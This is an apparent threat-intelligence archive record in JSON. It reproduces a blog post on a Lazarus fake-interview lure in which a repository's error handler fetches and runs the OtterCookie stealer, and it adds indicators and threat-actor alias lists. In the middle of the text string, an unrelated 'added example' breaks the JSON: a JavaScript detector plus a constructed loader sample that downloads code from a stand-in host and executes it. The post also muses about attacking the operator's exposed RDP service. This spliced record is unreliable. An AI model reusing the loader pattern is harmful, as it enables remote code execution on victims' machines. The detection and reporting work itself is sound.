{
	"id": "a98ff0cc-3901-4e18-951d-f963f79c8590",
	"created_at": "2026-04-06T00:22:33.392559Z",
	"updated_at": "2026-04-10T03:38:20.221542Z",
	"deleted_at": null,
	"sha1_hash": "d8d94230a79e6b5651ee9c536acfccb85d6e4f46",
	"title": "Interview with the Chollima",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 11102947,
	"plain_text": "Interview with the Chollima\r\nBy Mauro Eldritch\r\nPublished: 2025-11-07 · Archived: 2026-04-05 18:30:04 UTC\r\nAnother year, another Chollima added to our trophy wall.\r\nFebruary came and went once again, this time without a peep from our dear friends behind the Great Firewall,\r\nnor from those under the menacing guise of the Great Leader. Not that I missed them, but something felt… off.\r\nHad they forgotten about us? Are we no longer that important of a target? Did they simply decide to move on and\r\nforgive us every time we mocked them publicly—when their ACME-branded malware blew up in their faces,\r\ngiving us the chance to weaponize it into talks and articles at the best conferences and magazines in the world?\r\nNo, I don’t think they’re the type to turn the other cheek. They waited until April to fine-tune the stockade after\r\nplanning something highly targeted. At us.\r\nWell, at me.\r\nIt all started in the most vicious hunting ground for Threat Actors, when a muppet well-respected Lazarus agent\r\napproached me carelessly under the name \"Wilton Santos\", asking if I was open to working on a fix for its DApp.\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 1 of 13\n\nI asked for further clarification, and the sad story rolled in: they were a team of seven developers, but all of them\r\nwere on vacation (bad human resources planning there), and needed a trivial but urgent fix on its UI.\r\nThe DApp was “Gamba v2”, a gaming platform where users could join by connecting with their wallets (you\r\nmight think this is the strike point, but that would be too obvious). The UI problem was that they wanted to\r\ndynamically display the user’s wallet in a specific profile button. 
This is pretty trivial, and many JS libraries can do it in two or three lines of code.\r\nAfter successfully patching the issue, I just needed to send a video of the fix working, and I would be paid the astronomical amount of 500 USDT for a 3-line patch.\r\n\u003csarcasm\u003e\r\nI can’t believe there are BSD kernel developers out there submitting patches for free…\r\n\u003c/sarcasm\u003e\r\nI accepted, because I can smell a good old-fashioned APT campaign miles away.\r\nAnd then, our friend “Wilton” shared a Bitbucket repository.\r\nSee the background panel. Creation date: yesterday.\r\nTime to get the work done, I guess.\r\nThere’s important context to add here. The Chollimas (North Korean state-sponsored actors) are running a campaign targeting engineers and executives in the fintech and crypto sectors.\r\nThey attempt to trick engineers with fake job interviews or postings, coaxing them into running infected coding challenges.\r\nThey also target executives by luring them into Zoom calls with fake VCs or business partners. Once in, the attackers feign not hearing the victim speaking and act angry about it. Then, one of them shares a fake Zoom fix or update to solve the issue. Over the fear of the deal going sour, the victim usually runs it and gets infected.\r\nThis effort is being tracked as DevPopper or ContagiousInterview.\r\nBut this time, it’s different. As noted in the closure of the last section, this repository was created just a day ago, with no public mentions of it, the person who shared it with me, or the endpoints and infrastructure it attempts to reach.\r\nEverything is brand new.\r\nBut there’s still something more sinister about it: the code is completely clean. 
There’s no malicious payload, fake packages, infected libraries, or dependencies.\r\nIn Gibson’s words: It’s clear as ethanol.\r\nDifferent Lazarus divisions have different approaches.\r\nBut then, after carefully reviewing the code, I found their entry point, and I must say, it is the most creative one I’ve seen in a long time. While the code itself isn’t malicious, there’s a specific bootstrap function that will always fail. However, it’s contained within a Try/Catch block—a construct where the language will Try to do something and, if it goes wrong, Catch the resulting error instead of crashing, so the program can do something to remediate it.\r\nThat Catch block, in this case, will invoke a function called errorHandler, which will receive an error code directly from an external API… and execute it.\r\nYou read it right: the error code comes from a distant server in Finland (not a Gibson reference), and it is then executed via a require statement.\r\nThis is our implant!\r\nNow, we could just burn it in an intelligence pulse… or better yet, use what we know to strike back.\r\nThe server has two open ports: port 80, running the API on Node.js Express, and port 7777, identified as running RDP (Remote Desktop Protocol for Windows).\r\nReaching out to the API and triggering a fabricated error reveals an interesting internal output, where we can see that our friends are indeed using Windows… with the Administrator user.\r\nRunning internet-facing services as a privileged user—worse yet, as Administrator—is a bad idea and Wilton will find out about it pretty soon.\r\nThe other service running on port 7777 is Remote Desktop Protocol, which allows us to authenticate—if only we had the necessary credentials.\r\n
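The loader shape described above (a bootstrap step that always throws, and a catch handler that fetches an “error code” from a remote API and executes it) is exactly what a reviewer should catch before running a stranger’s repository. The following is an added example, not the article’s code and not the captured loader: a dependency-free static check that walks each catch block, follows one call hop into the functions it invokes, and flags code-execution sinks on that path, marking the finding as remote when network access is also on the path. The SAMPLE and BENIGN inputs are constructed for the example; the host name, the temp-file write and the function names in SAMPLE are assumptions for illustration, not details of the real loader.

```javascript
// Added example, not the article's code and not the captured loader: a static
// check for the shape described above. It walks every catch block in a source
// file, follows one hop into the functions that block calls (the errorHandler
// in the article), and reports code-execution sinks on that path. Network
// access anywhere on the path marks the finding as remote code execution.
// Brace matching stands in for a real parser so the check runs offline with
// no dependencies; braces inside string literals will confuse it.

const SINK_PATTERNS = [
  { name: 'eval', re: /\beval\s*\(/ },
  { name: 'new Function', re: /\bnew\s+Function\s*\(/ },
  { name: 'vm module', re: /\bvm\.(runInThisContext|runInNewContext|runInContext|compileFunction)\s*\(/ },
  // require() whose argument is not a string literal: a path built at runtime
  { name: 'dynamic require', re: /\brequire\s*\(\s*(?!['"`])/ },
];

const NETWORK_PATTERNS = [/\bfetch\s*\(/, /\baxios\b/, /\bhttps?\.(get|request)\s*\(/, /\bgot\s*\(/];

const KEYWORDS = new Set(['if', 'for', 'while', 'switch', 'catch', 'function', 'return',
  'await', 'typeof', 'throw', 'new', 'require', 'eval', 'Function']);

// Text between the '{' at index `open` and its matching '}'.
function blockBody(src, open) {
  let depth = 0;
  for (let i = open; i < src.length; i++) {
    if (src[i] === '{') depth++;
    else if (src[i] === '}' && --depth === 0) return src.slice(open + 1, i);
  }
  return src.slice(open + 1); // unbalanced input: take what is left
}

// Body of every `catch (e) {` / `catch {` block in the file.
function catchBodies(src) {
  const out = [];
  const re = /\bcatch\s*(?:\([^)]*\))?\s*\{/g;
  let m;
  while ((m = re.exec(src)) !== null) out.push(blockBody(src, m.index + m[0].length - 1));
  return out;
}

// Names called directly inside a block, e.g. `errorHandler(err)`; method calls
// such as console.error(...) are skipped because of the lookbehind on '.'.
function calledNames(body) {
  const names = new Set();
  const re = /(?<![\w$.])([A-Za-z_$][\w$]*)\s*\(/g;
  let m;
  while ((m = re.exec(body)) !== null) if (!KEYWORDS.has(m[1])) names.add(m[1]);
  return names;
}

// Body of a named function: `function name(`, `async function name(`,
// `name = function (` and `name = (...) =>` forms.
function functionBody(src, name) {
  if (!/^[A-Za-z_$][\w$]*$/.test(name)) return null;
  const re = new RegExp(
    `(?:function\\s+${name}\\s*\\([^)]*\\)|(?<![\\w$.])${name}\\s*=\\s*(?:async\\s*)?` +
    `(?:function\\s*\\([^)]*\\)|\\([^)]*\\)\\s*=>))\\s*\\{`);
  const m = re.exec(src);
  return m ? blockBody(src, m.index + m[0].length - 1) : null;
}

// One finding per sink reached from a catch block: { where, sink, remote }.
function scanForCatchLoader(src) {
  const findings = [];
  catchBodies(src).forEach((body, idx) => {
    const chain = [{ where: `catch#${idx}`, text: body }];
    for (const name of calledNames(body)) {
      const fb = functionBody(src, name);
      if (fb !== null) chain.push({ where: `${name}()`, text: fb });
    }
    const remote = chain.some(p => NETWORK_PATTERNS.some(re => re.test(p.text)));
    for (const p of chain) {
      for (const sink of SINK_PATTERNS) {
        if (sink.re.test(p.text)) findings.push({ where: p.where, sink: sink.name, remote });
      }
    }
  });
  return findings;
}

// Constructed sample mirroring the article's description: the bootstrap step
// can never succeed, and the handler executes whatever the server returns.
// The host name and the write-then-require step are assumptions for the
// example, not details taken from the real loader.
const SAMPLE = `
const axios = require('axios'), fs = require('fs'), os = require('os'), path = require('path');
async function errorHandler(err) {
  const res = await axios.get('http://loader.example.invalid/api/service/token/' + err.code);
  const p = path.join(os.tmpdir(), '.cache.js');
  fs.writeFileSync(p, res.data);   // the 'error code' is JavaScript text
  require(p);                      // ...and here it runs
}
function bootstrap() {
  try {
    JSON.parse(undefined);         // always throws
  } catch (e) {
    errorHandler(e);
  }
}
`;

// Constructed benign control: a catch block that only logs.
const BENIGN = `
function load() {
  try { return JSON.parse(process.env.CONFIG || '{}'); }
  catch (e) { console.error('bad config', e); return {}; }
}
`;

console.log(JSON.stringify(scanForCatchLoader(SAMPLE)));
console.log(JSON.stringify(scanForCatchLoader(BENIGN)));
```

In a real review you would feed it the repository’s sources (or wire it into a pre-run lint step) and treat any finding with remote set to true as a stop-the-line result. The check is deliberately conservative: it follows only one call hop and uses brace matching rather than a parser, so a determined author can bury the sink deeper, but it catches the exact construction the article describes, where the sink is one function call away from the catch.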
But that’s a story for another day. They don’t know we know, so let’s use that to our tactical advantage.\r\nUsing ANY.RUN’s sandbox, we spin up a disposable Ubuntu machine, install Node.js, and run the code as if we were an unsuspecting victim trying to make a quick 500 USDT (remember we’re here for that reason after all?).\r\nRunning the code, of course, triggers the mandatory failure, which lands in the Catch block, which receives the error from the Finnish API.\r\nBut what does that error say? It’s an obfuscated JavaScript snippet.\r\nThis would be executed directly on our local machine while we’re distracted trying to submit a patch for a visual bug. Lazarus loves obfuscating JavaScript code with a popular online tool, but since they don’t know we know, we’ll use it against them.\r\nAt first glance, it looks like BeaverTail—one of Lazarus’ latest cyberweapons, commonly paired with InvisibleFerret—but on closer inspection, it turns out to be another animal we still didn’t have in our personal collection: OtterCookie.\r\nThis not-so-playful otter works as a Stealer-type malware, targeting browser password managers and extensions (specifically crypto wallets), and is also deployed in the ContagiousInterview campaign.\r\nWe tried catching the Otter, and we did. We have the infrastructure, the sample, the involved accounts, and their communication script.\r\nIt was time to contact our ‘employer’ to update them on the progress of the job.\r\nI went back to LinkedIn and told my employer that I had two ways of implementing the patch and would like to have a short meeting to discuss them. 
He bought it and wanted me to run the sample during the call to see the results.\r\nAnd so, I started recording my screen, waiting in silence for the wild Chollima to set foot in the trap—and it did, with an anime profile picture and under the name of “0xdori DFO”.\r\nI expected to see a majestic winged horse stomping bravely over the scene, but instead, I ended up with a scared little pony fleeing.\r\nBut, I’ll let you judge that for yourself…\r\nThe following video has been edited (and the Threat Actor muted) to avoid disclosing certain indicators.\r\nWe may upload a full version in the future.\r\nThe pony pranced away in panic, without saying another word.\r\nBeing a gentleman, I thought we could at least exchange a proper farewell, but I was promptly blocked.\r\nWe claimed the game and called it a day.\r\nBut, my friends, the hunting season never ends…\r\nIPv4: 135.181.123.177\r\nDomain: chainlink-api-v3.cloud\r\nURL: http[:]//chainlink-api-v3[.]cloud/api/service/token/56e15ef3b5e5f169fc063f8d3e88288e\r\nURL: http[:]//chainlink-api-v3[.]cloud/api/\r\nURL: https[:]//bitbucket.org/0xhpenvynb/mvp_gamba/downloads/\r\nSHA256: aa0d64c39680027d56a32ffd4ceb7870b05bdd497a3a7c902f23639cb3b43ba1\r\nSHA256: 071aff6941dc388516d8ca0215b757f9bee7584dea6c27c4c6993da192df1ab9\r\nSHA256: 486f305bdd09a3ef6636e92c6a9e01689b8fa977ed7ffb898453c43d47b5386d\r\nSHA256: ec234419fc512baded05f7b29fefbf12f898a505f62c43d3481aed90fef33687\r\nFileName: 0xhpenvynb-mvp_gamba-6b10f2e9dd85.zip\r\nSOLWallet: V2grJiwjs25iJYqumbHyKo5MTK7SFqZSdmoRaj8QWb9\r\nOriginal Intelligence Pulse on LevelBlue OTX\r\nOtterCookie source code (obfuscated)\r\nOtterCookie source code (deobfuscated)\r\nFake project (loader) source code\r\nThis work would not be possible without the contribution from dedicated Lazarus Agents who surrendered their cyber-weapons to the 
Quetzal Team. We honor them here:\r\n❌ Edward from Labyrinth Chollima. Fell during the QRLog campaign, in which we discovered the QRLog malware.\r\n❌ Nargis from Velvet Chollima. Fell during the DreamJob campaign, in which we captured the Docks malware.\r\n❌ Artyom from Velvet Chollima. Fell during the ContagiousInterview campaign, in which, alongside another team, we discovered the ChaoticCapybara malware.\r\n❌ Wilton from Famous Chollima. Fell during the ContagiousInterview campaign, in which we captured the OtterCookie malware.\r\nComment [F] to pay respects and don’t cry for them: they fell bravely against the best.\r\nSource: https://quetzal.bitso.com/p/interview-with-the-chollima",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://quetzal.bitso.com/p/interview-with-the-chollima"
	],
	"report_names": [
		"interview-with-the-chollima"
	],
	"threat_actors": [
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-10T02:00:05.281246Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7187a642-699d-44b2-9c69-498c80bce81f",
			"created_at": "2025-08-07T02:03:25.105688Z",
			"updated_at": "2026-04-10T02:00:03.78394Z",
			"deleted_at": null,
			"main_name": "NICKEL TAPESTRY",
			"aliases": [
				"CL-STA-0237 ",
				"CL-STA-0241 ",
				"DPRK IT Workers",
				"Famous Chollima ",
				"Jasper Sleet Microsoft",
				"Purpledelta Recorded Future",
				"Storm-0287 ",
				"UNC5267 ",
				"Wagemole "
			],
			"source_name": "Secureworks:NICKEL TAPESTRY",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-10T02:00:03.851829Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d05e8567-9517-4bd8-a952-5e8d66f68923",
			"created_at": "2024-11-13T13:15:31.114471Z",
			"updated_at": "2026-04-10T02:00:03.761535Z",
			"deleted_at": null,
			"main_name": "WageMole",
			"aliases": [
				"Void Dokkaebi",
				"WaterPlum",
				"PurpleBravo",
				"Famous Chollima",
				"UNC5267",
				"Wagemole",
				"Nickel Tapestry",
				"Storm-1877"
			],
			"source_name": "MISPGALAXY:WageMole",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-10T02:00:04.895327Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434953,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d8d94230a79e6b5651ee9c536acfccb85d6e4f46.pdf",
		"text": "https://archive.orkl.eu/d8d94230a79e6b5651ee9c536acfccb85d6e4f46.txt",
		"img": "https://archive.orkl.eu/d8d94230a79e6b5651ee9c536acfccb85d6e4f46.jpg"
	}
}